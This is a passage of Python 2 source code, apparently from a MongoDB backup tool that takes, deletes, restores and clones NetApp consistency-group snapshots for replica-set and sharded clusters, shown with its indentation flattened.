logging.info('Collecting info about host {}'.format(rs_member['name'].split(':')[0]))
elif topology['cluster_type'] == 'sharded':
for cs_member in topology['config_servers']:
if cs_member['stateStr'] == 'PRIMARY' or cs_member['stateStr'] == 'SECONDARY':
host = HostConn(ipaddr=cs_member['name'].split(':')[0], username=self.backup['username'])
cs_member['storage_info'] = host.get_storage_layout(cluster_info['mongodb-mongod-conf'])
host.close()
logging.info('Collecting info about config server {}'.format(cs_member['name'].split(':')[0]))
for shard_replset in topology['shards']:
for shard_member in shard_replset['shard_members']:
if shard_member['stateStr'] == 'PRIMARY' or shard_member['stateStr'] == 'SECONDARY':
host = HostConn(ipaddr=shard_member['name'].split(':')[0], username=self.backup['username'])
shard_member['storage_info'] = host.get_storage_layout(cluster_info['mongodb-mongod-conf'])
host.close()
logging.info('Collecting info about shard member {}'.format(shard_member['name'].split(':')[0]))
snapshot_list = list()
if topology['cluster_type'] == 'replSet':
for rs_member in topology['members']:
if rs_member['stateStr'] == 'PRIMARY' or rs_member['stateStr'] == 'SECONDARY':
per_server_cg = dict()
per_server_cg['volume'] = list()
per_server_cg['snapname'] = self.backup['backup-name']
per_server_cg['snap-type'] = 'cgsnap'
per_server_cg['cg-timeout'] = 'relaxed'
per_server_cg['member_name'] = rs_member['name'].split(':')[0]
for volume in rs_member['storage_info']['volume_topology']:
per_server_cg['volume'].append(volume['volume'])
per_server_cg['svm-name'] = volume['svm-name']
snapshot_list.append(per_server_cg)
elif topology['cluster_type'] == 'sharded':
for cs_member in topology['config_servers']:
if cs_member['stateStr'] == 'PRIMARY' or cs_member['stateStr'] == 'SECONDARY':
per_server_cg = dict()
per_server_cg['volume'] = list()
per_server_cg['snapname'] = self.backup['backup-name']
per_server_cg['snap-type'] = 'cgsnap'
per_server_cg['cg-timeout'] = 'relaxed'
per_server_cg['member_name'] = cs_member['name'].split(':')[0]
for volume in cs_member['storage_info']['volume_topology']:
per_server_cg['volume'].append(volume['volume'])
per_server_cg['svm-name'] = volume['svm-name']
snapshot_list.append(per_server_cg)
for shard_replset in topology['shards']:
for shard_member in shard_replset['shard_members']:
if shard_member['stateStr'] == 'PRIMARY' or shard_member['stateStr'] == 'SECONDARY':
per_server_cg = dict()
per_server_cg['volume'] = list()
per_server_cg['snapname'] = self.backup['backup-name']
per_server_cg['snap-type'] = 'cgsnap'
per_server_cg['cg-timeout'] = 'relaxed'
per_server_cg['member_name'] = shard_member['name'].split(':')[0]
for volume in shard_member['storage_info']['volume_topology']:
per_server_cg['volume'].append(volume['volume'])
per_server_cg['svm-name'] = volume['svm-name']
snapshot_list.append(per_server_cg)
# -- If sharded cluster, stopping the balancer before taking any snapshot
if topology['cluster_type'] == 'sharded':
mdbcluster.stop_balancer()
# -- Creating CG snapshots
# -- -- Connecting to kairos_repo to get the storage credentials
kdb_netapp = kdb_session['ntapsystems']
for cgsnapshot in snapshot_list:
svm_info = kdb_netapp.find_one({'svm-name': cgsnapshot['svm-name']})
cs_svm = ClusterSession(svm_info['netapp-ip'], svm_info['username'], svm_info['password'], svm_info['svm-name'])
cgsnap = Snapshot(cgsnapshot)
result = cgsnap.cgcreate(cs_svm)
if result[0] == 'passed':
logging.info('CG Snapshot of member {} has been successfully taken.'.format(cgsnapshot['member_name']))
else:
#TODO: Rollback backup operation by deleting other volumes snapshots
logging.error('CG Snapshot of member {} has failed.'.format(cgsnapshot['member_name']))
logging.error(result[1])
if topology['cluster_type'] == 'sharded':
mdbcluster.start_balancer()
exit(1)
# -- If sharded cluster, starting the balancer after taking a snapshot
if topology['cluster_type'] == 'sharded':
mdbcluster.start_balancer()
# -- Saving backup metadata to the repository database
bkp_metadata['created_at'] = datetime.now()
bkp_metadata['backup_name'] = self.backup['backup-name']
bkp_metadata['cluster_name'] = self.backup['cluster-name']
bkp_metadata['mongo_topology'] = topology
bkp_metadata['retention'] = self._calc_retention(self.backup['retention'], bkp_metadata['created_at'])
kdb_backups = kdb_session['backups']
kdb_backups.insert_one(bkp_metadata)
def delete(self, kdb_session):
kdb_bkps = kdb_session['backups']
bkp2delete = kdb_bkps.find_one({'backup_name': self.backup['backup-name']})
if bkp2delete is None:
logging.error('Backup ' + self.backup['backup-name'] + ' not found.')
exit(1)
delete_list = dict()
if bkp2delete['mongo_topology']['cluster_type'] == 'replSet':
for rs_member in bkp2delete['mongo_topology']['members']:
if rs_member['stateStr'] == 'PRIMARY' or rs_member['stateStr'] == 'SECONDARY':
for vol in rs_member['storage_info']['volume_topology']:
if vol['svm-name'] not in delete_list.keys():
delete_list[vol['svm-name']] = list()
delete_list[vol['svm-name']].append(vol['volume'])
else:
delete_list[vol['svm-name']].append(vol['volume'])
elif bkp2delete['mongo_topology']['cluster_type'] == 'sharded':
for cs_member in bkp2delete['mongo_topology']['config_servers']:
if cs_member['stateStr'] == 'PRIMARY' or cs_member['stateStr'] == 'SECONDARY':
for vol in cs_member['storage_info']['volume_topology']:
if vol['svm-name'] not in delete_list.keys():
delete_list[vol['svm-name']] = list()
delete_list[vol['svm-name']].append(vol['volume'])
else:
delete_list[vol['svm-name']].append(vol['volume'])
for shard_replset in bkp2delete['mongo_topology']['shards']:
for shard_member in shard_replset['shard_members']:
if shard_member['stateStr'] == 'PRIMARY' or shard_member['stateStr'] == 'SECONDARY':
for vol in shard_member['storage_info']['volume_topology']:
if vol['svm-name'] not in delete_list.keys():
delete_list[vol['svm-name']] = list()
delete_list[vol['svm-name']].append(vol['volume'])
else:
delete_list[vol['svm-name']].append(vol['volume'])
# -- Checking if the snapshot is ready to be deleted across all volumes
kdb_netapp = kdb_session['ntapsystems']
for svm in delete_list.keys():
svm_info = kdb_netapp.find_one({'svm-name': svm})
cs_svm = ClusterSession(svm_info['netapp-ip'], svm_info['username'], svm_info['password'],
svm_info['svm-name'])
for volume in delete_list[svm]:
snapspec = dict()
snapspec['volume'] = volume
snapspec['snapname'] = bkp2delete['backup_name']
snapshot = Snapshot(snapspec)
result_getsnap = snapshot.get_snaps(cs_svm)
if result_getsnap[0] == 'passed':
xmloutput = xml.dom.minidom.parseString(result_getsnap[1])
snap_busy = xmloutput.getElementsByTagName('busy')[0].firstChild.data
if snap_busy == 'false':
logging.info('Snapshot ' + snapspec['snapname'] + ' from volume ' + snapspec['volume'] +
' passed the inspection to be deleted.')
else:
logging.error('Snapshot ' + snapspec['snapname'] + ' from volume ' + snapspec['volume'] +
' is busy and cannot be deleted.')
exit(1)
# -- Deleting snapshot across all volumes
kdb_netapp = kdb_session['ntapsystems']
for svm in delete_list.keys():
svm_info = kdb_netapp.find_one({'svm-name': svm})
cs_svm = ClusterSession(svm_info['netapp-ip'], svm_info['username'], svm_info['password'],
svm_info['svm-name'])
for volume in delete_list[svm]:
snapspec = dict()
snapspec['volume'] = volume
snapspec['snapname'] = bkp2delete['backup_name']
snapshot = Snapshot(snapspec)
delete_result = snapshot.delete(cs_svm)
if delete_result[0] == 'passed':
logging.info('Snapshot ' + snapspec['snapname'] + ' has been deleted from volume ' + snapspec['volume'])
else:
logging.error('Failed to delete snapshot ' + snapspec['snapname'] + ' on volume ' + snapspec['volume'] + '.')
result_bkp2delete = kdb_bkps.delete_one({'backup_name': self.backup['backup-name']})
def list_all(self, kdb_session):
kdb_bkps = kdb_session['backups']
result = kdb_bkps.find()
print '{:30} \t {:30} {:30}'.format('Backup Name', 'Created At', 'Expires At')
for bkp in result:
print '{:30} \t {:30} {:30}'.format(bkp['backup_name'], bkp['created_at'].strftime('%Y-%m-%d %H:%M:%S.%f'),
bkp['retention'].strftime('%Y-%m-%d %H:%M:%S.%f'))
def search_for_db(self, kdb_session, keyword):
kdb_bkps = kdb_session['backups']
key_search = 'mongo_topology.shards.databases.' + keyword
result = kdb_bkps.find({ key_search: { '$exists': True} })
print '{:30} \t {:30} {:30}'.format('Backup Name', 'Created At', 'Retention')
for bkp in result:
print '{:30} \t {:30} {:30}'.format(bkp['backup_name'],
bkp['created_at'].strftime('%Y-%m-%d %H:%M:%S.%f'),
bkp['retention'].strftime('%Y-%m-%d %H:%M:%S.%f')
)
def search_for_collection(self, kdb_session, database, collection):
kdb_bkps = kdb_session['backups']
key_search = 'mongo_topology.shards.databases.' + database
result = kdb_bkps.find({ key_search: collection })
print '{:30} \t {:30} {:30}'.format('Backup Name', 'Created At', 'Retention')
for bkp in result:
print '{:30} \t {:30} {:30}'.format(bkp['backup_name'],
bkp['created_at'].strftime('%Y-%m-%d %H:%M:%S.%f'),
bkp['retention'].strftime('%Y-%m-%d %H:%M:%S.%f')
)
def _calc_retention(self, retention, created_at):
unit = retention[len(retention)-1:]
value = retention[:-1]
if unit == 'm':
return created_at + timedelta(minutes=int(value))
elif unit == 'h':
return created_at + timedelta(hours=int(value))
elif unit == 'd':
return created_at + timedelta(days=int(value))
elif unit == 'w':
return created_at + timedelta(weeks=int(value))
class SubCmdRestore:
def __init__(self, rst_spec=None):
self.backup_name = rst_spec['backup-name']
self.cluster_name = rst_spec['cluster-name']
self.username = rst_spec['username']
self.archive_repo_uri = rst_spec['archive_repo_uri']
self.archive_repo_name = rst_spec['archive_repo_name']
def restore(self, catalog_sess=None):
bkp2restore = catalog_sess.find_one(coll_name='backups', query={'backup_name': self.backup_name,
'cluster_name': self.cluster_name})
if bkp2restore is None:
logging.error('Backup {} could not be found for cluster {}.'.format(self.backup_name, self.cluster_name))
exit(1)
# -- Preparation phase for ReplicaSet Cluster
if bkp2restore['mongo_topology']['cluster_type'] == 'replSet':
for rs_member in bkp2restore['mongo_topology']['members']:
host = HostConn(ipaddr=rs_member['name'].split(':')[0], username=self.username)
# -- Stopping mongod
stop_mongo = host.stop_service('mongod')
if stop_mongo[1] != 0:
logging.error('Cannot stop MongoDB on host {}.'.format(rs_member['name'].split(':')[0]))
exit(1)
else:
logging.info('MongoDB has been stopped on host {}.'.format(rs_member['name'].split(':')[0]))
# -- For every data bearing node: umount, vgchange and multipath stop
if rs_member['stateStr'] == 'PRIMARY' or rs_member['stateStr'] == 'SECONDARY':
umount_fs = host.umount_fs(fs_mountpoint=rs_member['storage_info']['mountpoint'])
if umount_fs[1] != 0:
logging.error('Cannot unmount MongoDB file system {}.'.format(rs_member['storage_info']['mountpoint']))
exit(1)
else:
logging.info('MongoDB file system {} has been successfully unmounted.'.format(rs_member['storage_info']['mountpoint']))
vgchange = host.disable_vg(vg_name=rs_member['storage_info']['lvm_vgname'])
if vgchange[1] != 0:
logging.error('Cannot deactive volume group {}.'.format(rs_member['storage_info']['lvm_vgname']))
exit(1)
else:
logging.info('MongoDB volume group {} has been successfully disabled.'.format(rs_member['storage_info']['lvm_vgname']))
multipath = host.stop_service('multipathd')
if multipath[1] != 0:
logging.error('Cannot stop multipathd on host {}.'.format(rs_member['name'].split(':')[0]))
exit(1)
else:
logging.info('Multipathd has been successfully stopped on host {}.'.format(rs_member['name'].split(':')[0]))
# -- Preparation phase for Sharded Clusters
if bkp2restore['mongo_topology']['cluster_type'] == 'sharded':
for cs_member in bkp2restore['mongo_topology']['config_servers']:
host = HostConn(ipaddr=cs_member['name'].split(':')[0], username=self.username)
# -- Stopping mongod
stop_mongo = host.stop_service('mongod')
if stop_mongo[1] != 0:
logging.error(
'Cannot stop MongoDB on host {}.'.format(cs_member['name'].split(':')[0]))
exit(1)
else:
logging.info(
'MongoDB has been stopped on host {}.'.format(cs_member['name'].split(':')[0]))
# -- For every data bearing node: umount, vgchange and multipath stop
if cs_member['stateStr'] == 'PRIMARY' or cs_member['stateStr'] == 'SECONDARY':
umount_fs = host.umount_fs(fs_mountpoint=cs_member['storage_info']['mountpoint'])
if umount_fs[1] != 0:
logging.error('Cannot unmount MongoDB file system {}.'.format(
cs_member['storage_info']['mountpoint']))
exit(1)
else:
logging.info('MongoDB file system {} has been successfully unmounted.'.format(
cs_member['storage_info']['mountpoint']))
vgchange = host.disable_vg(vg_name=cs_member['storage_info']['lvm_vgname'])
if vgchange[1] != 0:
logging.error('Cannot deactive volume group {}.'.format(
cs_member['storage_info']['lvm_vgname']))
exit(1)
else:
logging.info('MongoDB volume group {} has been successfully disabled.'.format(
cs_member['storage_info']['lvm_vgname']))
multipath = host.stop_service('multipathd')
if multipath[1] != 0:
logging.error('Cannot stop multipathd on host {}.'.format(
cs_member['name'].split(':')[0]))
exit(1)
else:
logging.info('Multipathd has been successfully stopped on host {}.'.format(
cs_member['name'].split(':')[0]))
for shard_replset in bkp2restore['mongo_topology']['shards']:
for shard_member in shard_replset['shard_members']:
host = HostConn(ipaddr=shard_member['name'].split(':')[0], username=self.username)
# -- Stopping mongod
stop_mongo = host.stop_service('mongod')
if stop_mongo[1] != 0:
logging.error(
'Cannot stop MongoDB on host {}.'.format(shard_member['name'].split(':')[0]))
exit(1)
else:
logging.info(
'MongoDB has been stopped on host {}.'.format(shard_member['name'].split(':')[0]))
# -- For every data bearing node: umount, vgchange and multipath stop
if shard_member['stateStr'] == 'PRIMARY' or shard_member['stateStr'] == 'SECONDARY':
umount_fs = host.umount_fs(fs_mountpoint=shard_member['storage_info']['mountpoint'])
if umount_fs[1] != 0:
logging.error('Cannot unmount MongoDB file system {}.'.format(
shard_member['storage_info']['mountpoint']))
exit(1)
else:
logging.info('MongoDB file system {} has been successfully unmounted.'.format(
shard_member['storage_info']['mountpoint']))
vgchange = host.disable_vg(vg_name=shard_member['storage_info']['lvm_vgname'])
if vgchange[1] != 0:
logging.error('Cannot deactive volume group {}.'.format(
shard_member['storage_info']['lvm_vgname']))
exit(1)
else:
logging.info('MongoDB volume group {} has been successfully disabled.'.format(
shard_member['storage_info']['lvm_vgname']))
multipath = host.stop_service('multipathd')
if multipath[1] != 0:
logging.error('Cannot stop multipathd on host {}.'.format(
shard_member['name'].split(':')[0]))
exit(1)
else:
logging.info('Multipathd has been successfully stopped on host {}.'.format(
shard_member['name'].split(':')[0]))
# -- Restore phase
snaprestore_list = dict()
if bkp2restore['mongo_topology']['cluster_type'] == 'replSet':
for rs_member in bkp2restore['mongo_topology']['members']:
if rs_member['stateStr'] == 'PRIMARY' or rs_member['stateStr'] == 'SECONDARY':
for vol in rs_member['storage_info']['volume_topology']:
if vol['svm-name'] not in snaprestore_list.keys():
snaprestore_list[vol['svm-name']] = list()
snaprestore_list[vol['svm-name']].append(vol['volume'])
else:
snaprestore_list[vol['svm-name']].append(vol['volume'])
elif bkp2restore['mongo_topology']['cluster_type'] == 'sharded':
for cs_member in bkp2restore['mongo_topology']['config_servers']:
if cs_member['stateStr'] == 'PRIMARY' or cs_member['stateStr'] == 'SECONDARY':
for vol in cs_member['storage_info']['volume_topology']:
if vol['svm-name'] not in snaprestore_list.keys():
snaprestore_list[vol['svm-name']] = list()
snaprestore_list[vol['svm-name']].append(vol['volume'])
else:
snaprestore_list[vol['svm-name']].append(vol['volume'])
for shard_replset in bkp2restore['mongo_topology']['shards']:
for shard_member in shard_replset['shard_members']:
if shard_member['stateStr'] == 'PRIMARY' or shard_member[
'stateStr'] == 'SECONDARY':
for vol in shard_member['storage_info']['volume_topology']:
if vol['svm-name'] not in snaprestore_list.keys():
snaprestore_list[vol['svm-name']] = list()
snaprestore_list[vol['svm-name']].append(vol['volume'])
else:
snaprestore_list[vol['svm-name']].append(vol['volume'])
for svm in snaprestore_list.keys():
svm_info = catalog_sess.find_one(coll_name='ntapsystems', query={'svm-name': svm})
cs_svm = ClusterSession(svm_info['netapp-ip'], svm_info['username'], svm_info['password'],
svm_info['svm-name'])
for volume in snaprestore_list[svm]:
snapspec = dict()
snapspec['volume'] = volume
snapspec['snapname'] = self.backup_name
snapshot = Snapshot(snapspec)
restore_result = snapshot.restore(cs_svm)
if restore_result[0] == 'passed':
logging.info('Snapshot ' + snapspec['snapname'] + ' has been restored on volume ' + snapspec['volume'])
else:
logging.error('Failed to restore snapshot ' + snapspec['snapname'] + ' on volume ' + snapspec['volume'] + '.')
logging.error(restore_result[1])
# -- Post restore phase for ReplicaSet Cluster
if bkp2restore['mongo_topology']['cluster_type'] == 'replSet':
for rs_member in bkp2restore['mongo_topology']['members']:
host = HostConn(ipaddr=rs_member['name'].split(':')[0], username=self.username)
# -- For every data bearing node: multipath start, vgchange, mount
if rs_member['stateStr'] == 'PRIMARY' or rs_member['stateStr'] == 'SECONDARY':
multipath = host.start_service('multipathd')
if multipath[1] != 0:
logging.error('Cannot start multipathd on host {}.'.format(rs_member['name'].split(':')[0]))
exit(1)
else:
logging.info(
'Multipathd has been successfully started on host {}.'.format(rs_member['name'].split(':')[0]))
vgchange = host.enable_vg(vg_name=rs_member['storage_info']['lvm_vgname'])
if vgchange[1] != 0:
logging.error('Cannot activate volume group {} on host {}.'.format(rs_member['storage_info']['lvm_vgname'], rs_member['name'].split(':')[0]))
exit(1)
else:
logging.info('MongoDB volume group {} has been successfully activated.'.format(
rs_member['storage_info']['lvm_vgname']))
mount_fs = host.mount_fs(fs_mountpoint=rs_member['storage_info']['mountpoint'], fs_type=rs_member['storage_info']['fs_type'], device=rs_member['storage_info']['mdb_device'])
if mount_fs[1] != 0:
logging.error(
'Cannot mount MongoDB file system {} on host {}.'.format(rs_member['storage_info']['mountpoint'], rs_member['name'].split(':')[0]))
exit(1)
else:
logging.info('MongoDB file system {} has been successfully mounted on host {}.'.format(
rs_member['storage_info']['mountpoint'], rs_member['name'].split(':')[0]))
# -- Starting mongod
start_mongo = host.start_service('mongod')
if start_mongo[1] != 0:
logging.error('Cannot start MongoDB on host {}.'.format(rs_member['name'].split(':')[0]))
exit(1)
else:
logging.info('MongoDB has been started on host {}.'.format(rs_member['name'].split(':')[0]))
# -- Post restore phase for Sharded Clusters
if bkp2restore['mongo_topology']['cluster_type'] == 'sharded':
for cs_member in bkp2restore['mongo_topology']['config_servers']:
host = HostConn(ipaddr=cs_member['name'].split(':')[0], username=self.username)
# -- For every data bearing node: multipath start, vgchange, mount
if cs_member['stateStr'] == 'PRIMARY' or cs_member['stateStr'] == 'SECONDARY':
multipath = host.start_service('multipathd')
if multipath[1] != 0:
logging.error('Cannot start multipathd on host {}.'.format(cs_member['name'].split(':')[0]))
exit(1)
else:
logging.info(
'Multipathd has been successfully started on host {}.'.format(cs_member['name'].split(':')[0]))
vgchange = host.enable_vg(vg_name=cs_member['storage_info']['lvm_vgname'])
if vgchange[1] != 0:
logging.error('Cannot activate volume group {} on host {}.'.format(cs_member['storage_info']['lvm_vgname'], cs_member['name'].split(':')[0]))
exit(1)
else:
logging.info('MongoDB volume group {} has been successfully activated.'.format(
cs_member['storage_info']['lvm_vgname']))
mount_fs = host.mount_fs(fs_mountpoint=cs_member['storage_info']['mountpoint'], fs_type=cs_member['storage_info']['fs_type'], device=cs_member['storage_info']['mdb_device'])
if mount_fs[1] != 0:
logging.error(
'Cannot mount MongoDB file system {} on host {}.'.format(cs_member['storage_info']['mountpoint'], cs_member['name'].split(':')[0]))
exit(1)
else:
logging.info('MongoDB file system {} has been successfully mounted on host {}.'.format(
cs_member['storage_info']['mountpoint'], cs_member['name'].split(':')[0]))
# -- Starting mongod
start_mongo = host.start_service('mongod')
if start_mongo[1] != 0:
logging.error('Cannot start MongoDB on host {}.'.format(cs_member['name'].split(':')[0]))
exit(1)
else:
logging.info('MongoDB has been started on host {}.'.format(cs_member['name'].split(':')[0]))
for shard_replset in bkp2restore['mongo_topology']['shards']:
for shard_member in shard_replset['shard_members']:
host = HostConn(ipaddr=shard_member['name'].split(':')[0], username=self.username)
# -- For every data bearing node: multipath start, vgchange, mount
if shard_member['stateStr'] == 'PRIMARY' or shard_member['stateStr'] == 'SECONDARY':
multipath = host.start_service('multipathd')
if multipath[1] != 0:
logging.error('Cannot start multipathd on host {}.'.format(shard_member['name'].split(':')[0]))
exit(1)
else:
logging.info(
'Multipathd has been successfully started on host {}.'.format(
shard_member['name'].split(':')[0]))
vgchange = host.enable_vg(vg_name=shard_member['storage_info']['lvm_vgname'])
if vgchange[1] != 0:
logging.error('Cannot activate volume group {} on host {}.'.format(
shard_member['storage_info']['lvm_vgname'], shard_member['name'].split(':')[0]))
exit(1)
else:
logging.info('MongoDB volume group {} has been successfully activated.'.format(
shard_member['storage_info']['lvm_vgname']))
mount_fs = host.mount_fs(fs_mountpoint=shard_member['storage_info']['mountpoint'],
fs_type=shard_member['storage_info']['fs_type'],
device=shard_member['storage_info']['mdb_device'])
if mount_fs[1] != 0:
logging.error(
'Cannot mount MongoDB file system {} on host {}.'.format(
shard_member['storage_info']['mountpoint'], shard_member['name'].split(':')[0]))
exit(1)
else:
logging.info('MongoDB file system {} has been successfully mounted on host {}.'.format(
shard_member['storage_info']['mountpoint'], shard_member['name'].split(':')[0]))
# -- Starting mongod
start_mongo = host.start_service('mongod')
if start_mongo[1] != 0:
logging.error('Cannot start MongoDB on host {}.'.format(shard_member['name'].split(':')[0]))
exit(1)
else:
logging.info('MongoDB has been started on host {}.'.format(shard_member['name'].split(':')[0]))
# -- Housekeeping on backup's metadata
delete_newers = catalog_sess.remove_many(coll_name='backups', query={'created_at':
{ '$gt': bkp2restore['created_at']}})
# -- restore completed
logging.info('Restore operation has been completed.')
class SubCmdClone:
def __init__(self, clone_args=None):
if clone_args['backup-name'] is not None:
self.backup_name = clone_args['backup-name']
if clone_args['cluster-name'] is not None:
self.cluster_name = clone_args['cluster-name']
if clone_args['desc'] is not None:
self.desc = clone_args['desc']
else:
self.desc = ''
self.clone_name = clone_args['clone-name']
self.clone_spec = clone_args['clone-spec']
self.username = clone_args['username']
self.clone_uid = time()
def create_storage_clone(self, kdb_session=None):
kdb_backup = kdb_session['backups']
bkp2clone = kdb_backup.find_one({'backup_name': self.backup_name, 'cluster_name': self.cluster_name})
if bkp2clone is None:
logging.error('Cannot find backup {} for cluster {}.'.format(self.backup_name, self.cluster_name))
exit(1)
# -- checking if clone spec file has the required number of members per replicaset
if self.clone_spec['cluster_type'] == 'replicaSet':
odd_members = len(self.clone_spec['replset']['members']) / 2.0
if odd_members == 0:
logging.error('You need an odd number of members to establish a replicaSet.')
exit(1)
elif self.clone_spec['cluster_type'] == 'sharded':
odd_cs_members = len(self.clone_spec['config_servers']['members']) / 2.0
if odd_cs_members == 0:
logging.error('You need an odd number of members to establish a CSRS.')
exit(1)
for shard in self.clone_spec['shards']:
odd_sh_members = len(shard['shard_members']) / 2.0
if odd_sh_members == 0:
logging.error('You need an odd number of members to establish a shard.')
exit(1)
# -- cloned cluster structure
cloned_cluster = dict()
cloned_cluster['cluster_type'] = self.clone_spec['cluster_type']
if self.clone_spec['cluster_type'] == 'replicaSet':
cloned_cluster['setname'] = self.clone_spec['replset']['setname']
cloned_cluster['members'] = list()
cloned_cluster['reconfig'] = dict()
elif self.clone_spec['cluster_type'] == 'sharded':
cloned_cluster['config_servers'] = dict()
cloned_cluster['config_servers']['setname'] = self.clone_spec['config_servers']['setname']
cloned_cluster['config_servers']['members'] = list()
cloned_cluster['config_servers']['reconfig'] = dict()
cloned_cluster['shards'] = list()
# -- replicaSet and shard reconfig -- rc stands for reconfig
# -- cc_cs stands for cloned_cluster config server
# -- cc_sh stands for cloned_cluster shard
if self.clone_spec['cluster_type'] == 'replicaSet':
count = 0
rc_members = dict()
for spec_member in self.clone_spec['replset']['members']:
rc_members['members.' + str(count) + '.host'] = spec_member['hostname'] + ':' + spec_member['port']
rc_members['members.' + str(count) + '.arbiterOnly'] = spec_member['arbiter_only']
count += 1
cloned_cluster['reconfig'] = rc_members
elif self.clone_spec['cluster_type'] == 'sharded':
# -- config server reconfig
count = 0
rc_cs_members = dict()
for spec_cs_member in self.clone_spec['config_servers']['members']:
rc_cs_members['members.' + str(count) + '._id'] = count
rc_cs_members['members.' + str(count) + '.host'] = spec_cs_member['hostname'] + ':' + \
spec_cs_member['port']
rc_cs_members['members.' + str(count) + '.arbiterOnly'] = spec_cs_member['arbiter_only']
rc_cs_members['members.' + str(count) + '.buildIndexes'] = True
rc_cs_members['members.' + str(count) + '.hidden'] = False
rc_cs_members['members.' + str(count) + '.priority'] = 1
rc_cs_members['members.' + str(count) + '.tags'] = dict()
rc_cs_members['members.' + str(count) + '.slaveDelay'] = 0
rc_cs_members['members.' + str(count) + '.votes'] = 1
count += 1
cloned_cluster['config_servers']['reconfig'] = rc_cs_members
# -- Stage 1 :: Setting it up -------------------
if self.clone_spec['cluster_type'] == 'sharded':
for spec_cs_member in self.clone_spec['config_servers']['members']:
if spec_cs_member['arbiter_only']:
cloned_cluster['config_servers']['members'].append(spec_cs_member)
continue
config_server = spec_cs_member
host = HostConn(ipaddr=spec_cs_member['hostname'], username=self.username)
igroup_spec = dict()
result_get_hostname = host.get_hostname()
if result_get_hostname[1] != 0:
logging.error('Could not get hostname from host {}.'.format(spec_cs_member['hostname']))
exit(1)
else:
logging.info('Preparing initiator group for host {}.'.format(spec_cs_member['hostname']))
igroup_spec['igroup-name'] = 'ig_' + result_get_hostname[0].strip('\n') + '_' + self.clone_name
igroup_spec['igroup-type'] = spec_cs_member['protocol']
igroup_spec['os-type'] = 'linux'
if spec_cs_member['protocol'] == 'iscsi':
result_get_iqn = host.get_iscsi_iqn()
if result_get_iqn[1] != 0:
logging.error('Could not get initiator name from host {}.'.format(spec_cs_member['hostname']))
exit(1)
else:
logging.info('Collecting initiator name on host {}.'.format(spec_cs_member['hostname']))
config_server['initiator'] = result_get_iqn[0].split('=')[1].strip()
config_server['igroup'] = InitiatorGroup(igroup_spec)
host.close()
config_server['volclone_topology'] = list()
config_server['lun_mapping'] = list()
for bkp_cs in bkp2clone['mongo_topology']['config_servers']:
if bkp_cs['stateStr'] == spec_cs_member['clone_from'].upper():
config_server['storage_info'] = dict()
config_server['storage_info']['lvm_vgname'] = bkp_cs['storage_info']['lvm_vgname']
config_server['storage_info']['fs_type'] = bkp_cs['storage_info']['fs_type']
config_server['storage_info']['mdb_device'] = bkp_cs['storage_info']['mdb_device']
for vol in bkp_cs['storage_info']['volume_topology']:
clone_spec = dict()
clone_spec['volume'] = self.clone_name + '_' + vol['volume'] + '_' + str(int(self.clone_uid))
clone_spec['parent-volume'] = vol['volume']
clone_spec['parent-snapshot'] = self.backup_name
flexclone = FlexClone(clone_spec)
config_server['volclone_topology'].append(flexclone)
logging.info('Volume {} ready to be cloned as {} on host {}'.format(vol['volume'],
clone_spec['volume'],
spec_cs_member['hostname']
))
lun_spec = dict()
lun_spec['path'] = '/vol/' + clone_spec['volume'] + '/' + vol['lun-name']
lun_spec['igroup-name'] = igroup_spec['igroup-name']
lun_map = Lun(lun_spec)
config_server['lun_mapping'].append(lun_map)
logging.info('Preparing LUN {} to be mapped to igroup {}.'.format(lun_spec['path'],
lun_spec['igroup-name']
))
break
cloned_cluster['config_servers']['members'].append(config_server)
for spec_shard in self.clone_spec['shards']:
shard_replset = dict()
shard_replset['name'] = spec_shard['shard_name']
shard_replset['members'] = list()
shard_replset['reconfig'] = dict()
# -- preparing shard replicaset reconfig document
count = 0
rc_sh_members = dict()
for spec_sh_member in spec_shard['shard_members']:
rc_sh_members['members.' + str(count) + '._id'] = count
rc_sh_members['members.' + str(count) + '.host'] = spec_sh_member['hostname'] + ':' + \
spec_sh_member['port']
rc_sh_members['members.' + str(count) + '.arbiterOnly'] = spec_sh_member['arbiter_only']
rc_sh_members['members.' + str(count) + '.buildIndexes'] = True
rc_sh_members['members.' + str(count) + '.hidden'] = False
rc_sh_members['members.' + str(count) + '.priority'] = 1
rc_sh_members['members.' + str(count) + '.tags'] = dict()
rc_sh_members['members.' + str(count) + '.slaveDelay'] = 0
rc_sh_members['members.' + str(count) + '.votes'] = 1
count += 1
shard_replset['reconfig'] = rc_sh_members
for spec_sh_member in spec_shard['shard_members']:
member = dict()
if spec_sh_member['arbiter_only']:
shard_replset['members'].append(spec_sh_member)
continue
member = spec_sh_member
host = HostConn(ipaddr=spec_sh_member['hostname'], username=self.username)
igroup_spec = dict()
result_get_hostname = host.get_hostname()
if result_get_hostname[1] != 0:
logging.error('Could not get hostname from host {}.'.format(spec_sh_member['hostname']))
exit(1)
else:
logging.info('Preparing initiator group for host {}.'.format(spec_sh_member['hostname']))
igroup_spec['igroup-name'] = 'ig_' + result_get_hostname[0].strip('\n') + '_' + self.clone_name
igroup_spec['igroup-type'] = spec_sh_member['protocol']
igroup_spec['os-type'] = 'linux'
if spec_sh_member['protocol'] == 'iscsi':
result_get_iqn = host.get_iscsi_iqn()
if result_get_iqn[1] != 0:
logging.error('Could not get initiator name from host {}.'.format(spec_sh_member['hostname']))
exit(1)
else:
logging.info('Collecting initiator name on host {}.'.format(spec_sh_member['hostname']))
member['initiator'] = result_get_iqn[0].split('=')[1].strip()
member['igroup'] = InitiatorGroup(igroup_spec)
host.close()
member['volclone_topology'] = list()
member['lun_mapping'] = list()
for bkp_shard in bkp2clone['mongo_topology']['shards']:
for bkp_shard_member in bkp_shard['shard_members']:
if (bkp_shard_member['stateStr'] == spec_sh_member['clone_from'].upper()) and (
bkp_shard['shard_name'] == spec_shard['shard_name']):
member['storage_info'] = dict()
member['storage_info']['lvm_vgname'] = bkp_shard_member['storage_info']['lvm_vgname']
member['storage_info']['fs_type'] = bkp_shard_member['storage_info']['fs_type']
member['storage_info']['mdb_device'] = bkp_shard_member['storage_info']['mdb_device']
for vol in bkp_shard_member['storage_info']['volume_topology']:
if vol['svm-name'] != spec_sh_member['svm-name']:
logging.error('You are asking a clone from a {} member on svm {}, but there is no {} on svm {} for shard {} on backup {}'.format(
spec_sh_member['clone_from'], spec_sh_member['svm-name'], spec_sh_member['clone_from'],
spec_sh_member['svm-name'], shard['shard_name'], self.backup_name
))
exit(1)
clone_spec = dict()
clone_spec['volume'] = self.clone_name + '_' + vol['volume'] + '_' + str(
int(self.clone_uid))
clone_spec['parent-volume'] = vol['volume']
clone_spec['parent-snapshot'] = self.backup_name
flexclone = FlexClone(clone_spec)
member['volclone_topology'].append(flexclone)
